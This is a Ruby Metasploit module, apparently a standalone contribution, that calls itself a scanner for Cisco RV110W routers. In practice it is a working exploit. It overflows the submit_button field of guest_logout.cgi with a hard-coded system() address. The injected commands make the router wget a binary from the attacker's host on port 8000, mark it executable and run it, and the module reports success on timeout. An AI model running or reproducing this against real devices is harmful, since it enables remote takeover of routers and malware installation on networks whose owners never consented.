require "net/http"
require "uri"
require "json"
class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    include Msf::Exploit::Remote::Tcp
   
    def initialize
      super(
        'Name'           => 'CISCO_RV110W_Aleph-0',
        'Description'    => 'This module is used to scan the target site for CISCO RV110W',
        'Author'         => 'H1T52{Aleph-0}',
        'License'        => MSF_LICENSE
      )
      deregister_options('SSL','VHOST','Proxies')
      register_options(
        [
          OptString.new('RHOSTS', [true, 'The target HOST.', '192.168.119.133']),
          OptString.new('RPORT', [true, 'The target PORT.', '1234']),
          OptString.new('LHOSTS', [true, 'Your HOST.', '192.168.119.131'])
        ]) 
    
    end 
    
    def pack(number, bits, endian)
                                         
      limit = 1 << bits                                                
      unless 0 <= number && number < limit                                                    
        raise ArgumentError, "unsigned number=#{number} does not fit within bits=#{bits}"          
      end  

      number &= (1 << bits) - 1                                    
      bytes = (bits + 7) / 8                   
      out = []                                                    
      bytes.times do
        out << (number & 0xFF)
        number >>= 8             
      end               
                                                                                 
      out = out.pack('C*')                                                                                    
      endian == 'little' ? out : out.reverse
    end    

    def p32(number)
      pack(number,bits=32,endian='little')
    end

    def run
	system = 0x0047A610

	cmd  = "\n"
	cmd += "wget http://" + datastore['LHOSTS'] + ":8000/msf -O /msf\n"
	cmd += "chmod 777 /msf\n"
	cmd += "/msf\n"


	payload = "status_guestnet.asp" + cmd.ljust(0x55,'a') + p32(system) 
	url = "http://" + datastore['RHOSTS'] + "/guest_logout.cgi"
	uri = URI(url)
	http = Net::HTTP.new(uri.hostname, datastore['RPORT'].to_i)
	req = Net::HTTP::Post.new(uri)

	req.set_form_data("cmac" => "12:af:aa:bb:cc:dd", "submit_button" => payload, "cip" => "192.168.100.1")
	http.read_timeout = 1
	http.open_timeout = 1
	begin
	  res = Net::HTTP.start(uri.hostname, uri.port) {|http|
	    http.request(req)
	  }
	  print_error("Some errors occur...")
	rescue Net::ReadTimeout => error
	  if error.message.include? "TCPSocket:(closed)"
	    print_good("Router CISCO RV110W series vulnerabilities are detected successfully")
	  else
	    print_good("Router CISCO RV110W series vulnerabilities were not detected")
	  end
	end
    end
end

